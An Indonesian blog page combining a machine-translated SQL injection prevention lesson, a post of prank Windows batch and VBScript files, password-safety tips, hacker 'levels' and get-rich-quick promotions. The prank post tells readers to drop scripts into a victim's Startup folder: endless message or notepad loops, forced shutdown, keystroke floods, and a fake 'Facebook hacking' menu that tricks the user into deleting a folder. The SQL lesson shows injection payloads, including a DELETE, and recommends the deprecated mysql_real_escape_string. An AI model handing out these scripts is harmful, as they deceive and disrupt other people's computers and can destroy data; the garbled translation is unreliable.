my SQL injection

MySQL – SQL Injection Prevention

Jika kamu pernah mengambil input pengguna mentah dan memasukkannya ke database MySQL ada kemungkinan bahwa kamu udah meninggalkan diri kamu sendiri  terbuka lebar untuk masalah keamanan yang dikenal dengan SQL Injection. Pelajaran ini akan mengajarkan kamu bagaimana untuk membantu mencegah hal ini terjadi dan membantu kamu  mengamankan script dan pernyataan MySQL.

Apa itu SQL Injection

SQL Injection mengacu pada tindakan seseorang memasukkan pernyataan MySQL dijalankan pada database kamu  tanpa sepengetahuan kamu. Injeksi biasanya terjadi ketika Anda meminta user untuk masukan, seperti nama mereka, dan bukan nama mereka MySQL memberi kamu pernyataan bahwa kamu akan sadar dijalankan di database kamu.

Contoh SQL Injection.

Di bawah ini adalah contoh string yang telah dikumpulkan dari user biasa dan pengguna yang buruk mencoba untuk menggunakan SQL Injection. Kami meminta pengguna untuk login, yang akan digunakan untuk menjalankan perintah SELECT untuk mendapatkan informasi.

MySQL & PHP Code:

// a good user’s name

$name = “timmy”;

$query = “SELECT * FROM customers WHERE username = ‘$name’”;

echo “Normal: ” . $query . “<br />”;

// user input that uses SQL Injection

$name_bad = “‘ OR 1′”;

// our MySQL query builder, however, not a very safe one

$query_bad = “SELECT * FROM customers WHERE username = ‘$name_bad’”;

// display what the new query will look like, with injection

echo “Injection: ” . $query_bad;

Display :

Normal: SELECT * FROM customers WHERE username = ‘timmy’
Injection: SELECT * FROM customers WHERE username = ” OR 1”

Query normal tidak masalah, sebagai pernyataan MySQL kita akan hanya pilih semua dari pelanggan yang memiliki sama dengan nama pengguna timmi. Namun, serangan injeksi telah benar-benar membuat permintaan kami berperilaku berbeda daripada yang kita inginkan. Dengan menggunakan kutip tunggal ( ‘) mereka telah mengakhiri string bagian dari query MySQL

• username = ‘  dan kemudian ditambahkan pada pernyataan WHERE kami dengan clause OR 1 (selalu benar).
• username = ‘ ‘ OR 1 clause  ini 1 akan selalu benar dan jadi setiap satu entri dalam “customers” tabel akan dipilih oleh pernyataan ini!
  

SQL Injection Attacks

Meskipun contoh di atas ditampilkan sebuah situasi di mana seorang penyerang mungkin bisa mendapatkan akses ke banyak informasi yang mereka tidak seharusnya, serangan bisa saja lebih buruk. Misalnya seorang penyerang dapat mengosongkan meja dengan mengeksekusi pernyataan DELETE.

MySQL & PHP Code:

$name_EVIL = “‘; DELETE FROM customers WHERE 1 or username = ‘”;
// our MySQL query builder really should check for injection
$query_evil = “SELECT * FROM customers WHERE username = ‘$name_evil’”;
// the new evil injection query would include a DELETE statement
echo “Injection: ” . $query_EVIL;

Display:

SELECT * FROM customers WHERE username = ‘ ‘; DELETE FROM customers WHERE 1 or username = ‘ ‘

Jika kamu menjalankan query ini, maka disuntikkan pernyataan HAPUS Anda akan benar-benar kosong “costummer” table. Sekarang kamu tahu ini adalah masalah, bagaimana kamu dapat mencegahnya?

Injection Prevention – mysql_real_escape_string()

Beruntung bagi kamu, masalah ini telah diketahui untuk sementara waktu dan PHP memiliki fungsi yang dibuat khusus untuk mencegah serangan ini. Yang perlu kamu lakukan adalah menggunakan mulut penuh fungsi mysql_real_escape_string. Apa mysql_real_escape_string lakukan adalah mengambil sebuah string yang akan digunakan dalam query MySQL dan kembali string yang sama dengan semua upaya SQL Injection melarikan diri dengan aman. Pada dasarnya, ini akan menggantikan mereka yang bermasalah quotes ( ‘) pengguna dapat masuk dengan aman MySQL-pengganti, yang melarikan diri quote \’. Mari kita mencoba fungsi ini pada kami dua serangan injeksi sebelumnya dan melihat cara kerjanya.

MySQL & PHP Code:

//NOTE: you must be connected to the database to use this function!
// connect to MySQL
$name_bad = “‘ OR 1′”;
$name_bad = mysql_real_escape_string($name_bad);
$query_bad = “SELECT * FROM customers WHERE username = ‘$name_bad’”;
echo “Escaped Bad Injection: <br />” . $query_bad . “<br />”;
$name_evil = “‘; DELETE FROM customers WHERE 1 or username = ‘”;
$name_evil = mysql_real_escape_string($name_evil);
$query_evil = “SELECT * FROM customers WHERE username = ‘$name_evil’”;
echo “Escaped Evil Injection: <br />” . $query_evil;

Display:

Escaped Bad Injection:
SELECT * FROM customers WHERE username = ‘\’ OR 1\”
Escaped Evil Injection:
SELECT * FROM customers WHERE username = ‘\’; DELETE FROM customers WHERE 1 or username = \”

Perhatikan bahwa tanda kutip kejahatan mereka telah melarikan diri dengan garis miring terbalik \, mencegah serangan injeksi. Sekarang semua pertanyaan ini akan lakukan adalah mencoba untuk menemukan nama pengguna yang hanya benar-benar konyol:

• Buruk: \ ‘OR 1 \’
• Evil: \ ‘; DELETE FROM costumers WHERE 1 OR username = \’

Dan aku  kira kita tidak perlu khawatir tentang orang-orang bodoh nama pengguna mendapatkan akses ke database MySQL. Jadi silakan lakukan menggunakan berguna mysql_real_escape_string () fungsi untuk membantu mencegah serangan SQL Injection pada situs web kamu.kamu  tidak memiliki alasan untuk tidak menggunakannya setelah membaca pelajaran ini!

Display

Kumpulan Script Aneh

Bermain2 dengan Script emg sangat menyenagkan!!. terutama di dunia maya hiungga membuat bingung Kompi!!. kali ne w mew bagi2 Script yang w temuin di dapurnya pak Google!!. yach… meskipun Script ne udah basi bgt… gg ada salahnya kita padukan dengan beberapa trik-trik anyar!!. hehehehe…

Jika lu anggap diri lu paling usil se dunia, w kira keusilan lu belum lengkap kalo gg tew neh Script!!

Pak Google,,, tolong di jelasin…
- Open Notepad lalu seperti biasa tinggal ‘copas’ script d bawah ne!!
- Kalo Filenya udah jadi,, terserah mew lu letakkan dmn,, tpi w saranin tempat yang paling manteb adalah di Start Up!!

1.  Bikin Message Aneh…
@ECHO off
:Begin
msg * ..:: CAUTION ::..
msg * Kaeaknya Kompi lu Sakit GIGI de..
msg * Udah Periksa ja ke Pak google sono..!!
msg * Atw… Instal ulang ja Kompi lu..
msg * Pasti bisa sembuh…
msg * Haghaghagzzz..!!
GOTO BEGIN

Save terserah nama pa!! yang penting Eksistensinya ( .BAT )

2.  Bikin Shutdown trus da Messagenya…
@ECHO off
msg * %%%%% WARNING %%%%
shutdown -s -c “Error !!!”

Save terserah nama pa!! yang penting Eksistensinya ( .BAT )

3.  Maenin Caps Lock Mati Idup…
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

Save terserah nama pa!! yang penting Eksistensinya ( .vbs )

4.  Maenin CD room Pusing..!!
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save terserah nama pa!! yang penting Eksistensinya ( .vbs )

5.  Bikin vbscript nongol mlu…
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

Save terserah nama pa!! yang penting Eksistensinya ( .vbs)

6.  Bikin tombol Backspace Bingung setengah mati!!
MsgBox “Back to Before Menu”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop

Save terserah nama pa!! yang penting Eksistensinya ( .vbs)

7.  Bikin otomatis ngetik “HALLOW…!!” di notepad/word…
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “HALLOW…!!”
loop

Save terserah nama pa!! yang penting Eksistensinya ( .vbs)

8.  Bikin supaya buka notepad mlu…
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save terserah nama pa!! yang penting Eksistensinya ( .BAT)
- Ati2 cz ni script klo mnurut ane pling ngeselin bgt….
- Klo mw yg kluar bkn notepad tinggal rubah ja DIR’y….

9.   Bikin supaya setiap buka notepad otomatis ngetik apa yg ente mau…
WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “Notepad”
WScript.Sleep 50
WshShell.SendKeys “M”
WScript.Sleep 50
WshShell.SendKeys “A”
WScript.Sleep 50
WshShell.SendKeys “N”
WScript.Sleep 50
WshShell.SendKeys “T “
WScript.Sleep 50
WshShell.SendKeys “A “
WScript.Sleep 50
WshShell.SendKeys “B”
WScript.Sleep 50
WshShell.SendKeys “B”
WScript.Sleep 50
WshShell.SendKeys “Z”

Save terserah nama pa!! yang penting Eksistensinya ( .vbs)

10.  Nipu orang y kaeak gne ne caranya!!
@echo off
Nipu Pakek Hack Pesbuk
:menu
cls
echo ada 3 cara Hacking Facebook. silahkan kamu pilih 1 diantara 3 pilihan di bawah ini…
pause
echo Tekanlah angka untuk melanjutkan!!
echo 1. Injection spy database
echo 2. Crack MD5 hash Password Accoount
echo 3. Search database server
set input=nothing
set /p input=Choice:
if %input%==1 Restart -s -t 30
if %input%==2 del c:\xxx (xxx=nama folder yang akan di delete)
if %input%==3 @ECHO off
msg * …:: W A R N I N G ::…
msg * Maaf brow…!!
msg * W sengaja NGERJAIN lu..!!
msg * salam kenal Browww..!!
msg * PISS….
msg * haghaghagzzzz…!!
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save terserah nama pa!! yang penting Eksistensinya ( .BAT)

Huufffttt..!!! capek bgt neh!!. udah dlu eah.. w mew ke toilet dlu!!.
kalo ada kesalahan,, w minta maaf sebesar2nya eah…

Tips Hack and Crack Password

Hacker dan Cracker saat ne makin kreatif dengan keahliannya, dengan berbagai cara mereka berusaha menembus Email, Friendster, Rekening online, Website, bahkan blog yang kamu miliki!!. pastinya kalian gg mau kan, kalau suatu saat profile kamu di Facebook diubah oleh orang? Atau Website kamu tiba-tiba di ganti tampilannya oleh Hacker/Cracker ?

Salah satu cara Hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

Cara Hacker menebak password kita antara lain dengan:

1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaaa sampai zzzzz, hingga beberapa karakter.
2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

• 123456, qwerty, asdf, ini karena gampang bgt orang mengetik kombinasi ini di keyboard.
• Password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
• Tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

• Menggunakan semua huruf kecil.
• Menggunakan kombinasi kata dan angka, misalnya Mobil80, Jojoe70.
• Mengganti huruf dengan karakter, misalnya c1nt@

Bagaimana password yang kuat dan sulit ditembus hacker?

1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
2. Panjang lebih dari 10 karakter.
3. Tidak menyertakan kata-kata dalam kamus.

Password yang kuat harus mudah diingat oleh pemiliknya.
Contoh password yang kuat: 194nt3nG

Cara mengingatnya:

1. 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
2. 94nt3nG = Ganteng
   

Beberapa tips agar password tidak mudah dibobol:

1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email kamu sama dengan password friendster. Ini berarti:  (* Seseorang yang dapat menjebol password friendster kamu, bisa juga menjebol password email kamu. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo. * Admin atau “orang dalam” friendster tahu password kamu, dia juga bisa memasukkan password tersebut ke email kamu).
2. Jangan mengklik link di email yang menyatakan kamu harus memverifikasi password kamu. Email ini dikirim oleh hacker.
3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
4. Sebelum login ke email atau yang lain, pastikan URL di browser kamu benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard kamu dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

huuhhh… udah segitu aja tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan. Semoga dgn ini anda bisa lebih berhati-hati dan account kita aman dan terhindar dari kebobolan.

Hack and Crack

HACKER

Hacker adalah sebutan untuk orang atau sekelompok orang yang memberikan sumbangan bermanfaat untuk dunia jaringan dan sistem operasi, membuat program bantuan untuk dunia jaringan dan komputer. Hacker juga bisa di kategorikan perkerjaan yang dilakukan untuk mencari kelemahan suatu system dan memberikan ide atau pendapat yang bisa memperbaiki kelemahan system yang di temukannya.

CRACKER

Sedangkan Cracker adalah sebutan untuk orang yang mencari kelemahan system dan memasukinya untuk kepentingan pribadi dan mencari keuntungan dari system yang di masuki, seperti: pencurian data, penghapusan, dan banyak yang lainnya.

TINGKATAN HACKER

Ternyata Hacker juga mempunyai tingkatan-tingkatan, tiap tingkatan di bedakan dengan kemampuan dan ilmu yang dimiliki sang hacker :

1.Elite

Ciri-ciri : mengerti sistem operasi luar dalam, sanggup mengkonfigurasi & menyambungkan jaringan secara global, melakukan pemrogramman setiap harinya, effisien & trampil, menggunakan pengetahuannya dengan tepat, tidak menghancurkan data-data, dan selalu mengikuti peraturan yang ada. Tingkat Elite ini sering disebut sebagai ‘suhu’.

2.  Semi Elite

Ciri-ciri : lebih muda dari golongan elite, mempunyai kemampuan & pengetahuan luas tentang komputer, mengerti tentang sistem operasi (termasuk lubangnya), kemampuan programnya cukup untuk mengubah program eksploit.

3.  Developed Kiddie

Ciri-ciri : umurnya masih muda (ABG) & masih sekolah, mereka membaca tentang metoda hacking & caranya di berbagai kesempatan, mencoba berbagai sistem sampai akhirnya berhasil & memproklamirkan kemenangan ke lainnya, umumnya masih menggunakan Grafik User Interface (GUI) & baru belajar basic dari UNIX tanpa mampu menemukan lubang kelemahan baru di sistem operasi.

4.  Script Kiddie

Ciri-ciri : seperti developed kiddie dan juga seperti Lamers, mereka hanya mempunyai pengetahuan teknis networking yang sangat minimal, tidak lepas dari GUI, hacking dilakukan menggunakan trojan untuk menakuti & menyusahkan hidup sebagian pengguna Internet.

5.  Lammer

Ciri-ciri : tidak mempunyai pengalaman & pengetahuan tapi ingin menjadi hacker sehingga lamer sering disebut sebagai ‘wanna-be’ hacker, penggunaan komputer mereka terutama untuk main game, IRC, tukar menukar software prirate, mencuri kartu kredit, melakukan hacking dengan menggunakan software trojan, nuke & DoS, suka menyombongkan diri melalui IRC channel, dan sebagainya. Karena banyak kekurangannya untuk mencapai elite, dalam perkembangannya mereka hanya akan sampai level developed kiddie atau script kiddie saja.

Cracker tidak mempunyai hirarki khusus karena sifatnya hanya membongkar dan merusak. dan msuklah kalian pada golongan Hacker!!. Cz,, U can see me there!!.

…Download System Hack…

Trik SUKSES Bisnis Online

Pengen tau Trik Pebisnis Online ..?? yang berpenghasilan 300.000 se-KALI Online!!. gampang ja..!! klik disini. Pelajari selengkapnya, dan ber-GEGAS-lah menuju ke-SUKSES-an!!!.

Cara daftar di Twitter

Mengenal Twitter

Tentunya kmau-kamu udah pada tahu ma yang namanya Twitter. Twitter adalah sebuah micro-blogging atau blog mikro. dapat juga dikatakan sebuah jaringan sosial seperti halnya Facebook, Friendster, dan YM. Di Indonesia Twitter emang kalah populer dibandingkan dengan Facebook Friendster, dan YM dan media social lainnya yang saat ini sudah mencapai lebih dari 200 juta pengguna di seluruh dunia. Tapi tahu ggg c kamu bahwa Twitter juga merupakan sebuah jaringan sosial yang cukup ampuh apabila Anda memanfaatkannya untuk mencari, mendapatkan teman serta memasarkan Bisnis online Anda. Seperti Bisnis Online yang aku geluti!!.

Bicara soal bisnis,,, percaya gg kalo aku ngedapetin duit 300.000/10 hari dari internet..??, aku yakin gg semuanya percaya, tpi,, aku udah ngebuktikan dan walhasil,,, aku bisa nyoba hidup mewah dalam kesederhanaan aku. Kalo kalian penasaran dan ingin mencobanya.,,, silahkan Klik disini

Uppzz!! kita kembali ke Twitter!!

Seperti media sosial lainnya, Twitter adalah gratis. Cukup berbekal e-mail yang valid dan digunakan setiap hari sudah cukup untuk mendapatkan alamat Twitter. Anda jangan sampai mau ketinggalan dengan beberapa perusahaan besar seperti CNN, Google, Yahoo, Microsoft dan lain sebagainya yang sudah memiliki alamat twitter yang unik.

Adapun format alamat penamaan Twitter akan berupa www.twitter.com/namaKamu. Sebuah penamaan yang cukup unik dan menarik apabila suatu ketika kamu ditanyakan oleh orang lain tentang alamat twitter kamu.

Lanjutkan membaca ‘Cara daftar di Twitter’

Cara Download Youtube ber-Kapasitas Besar

Tahukah kamu gimana caranya ngeDownload Video Youtube berkapasitas besar dengan cepat…?? pastinya hanya sedikit orang saja yang mengetahui Trik ne!!.

uQeh!! langsung ja akuh pengen ngasi sedikit deskripsi gimana caranya agar supaya kita bisa nge-download Vodeo file besar dengan cepat. Kenapa demikian?? Software ini secara otomatis akan membagikan file download kamu menjadi tujuh bagian system yang masing-masing bekerja nge-download file kamu. file yang memiliki kapasitas 500Mega atau bahkan sampai hitungan Giga kamu gg perlu lagi repot n kecape’an nungguin. Penasaran..??  Silahkan ja kamu download softwarenya disini, dan cara penggunaannya anda bisa kamu pelajari disini. Mudahkan..?? Kalo anda masih penasaran kirim aja email ke makruzil.alie@gmail.com, Semoga bisa membantu kamu untuk bikin PC kamu penuh dengan Pilem!! “Bukan termasuk Pilem item lho…”

Cara Membuat Layout Friendster

Banyak kita jumpai Friendter dengan LayOut made in Sendiri!!. Aku sengaja bikin Tutorial Untuk membuat layout Friendster sendiri. Caranya mudah saja, yang diperlukan hanyalah keinginin yang kuat untuk bikin FS lu menarik!!. Banyak website penyedia layout generator seperti, Pimp-my-Profile, idfriendsterlayout, layouts.fm dan masih banyak lainnya. Untuk memulainya kamu pilih dulu salah satu layout generator yang udah aku sebutin.

Dari beberapa pilihan generator yang udah aku sebutin, idfriendsterlayout yang mungkin akan lebih terlihat menarik dan gampang untuk pembuatannya.

1. Buka idfriendsterlayout generator. Kemudian klik tombol Create New Layout.
2. Kemudian mulailah dengan mengganti page background, seperti pada gambar di bawah.

Selanjutnya ubah tampilan Global Font (huruf), Links, Boxes (kotak), Modules, Control Panel, dan Photo yang kamu sukai.

Lanjutkan membaca ‘Cara Membuat Layout Friendster’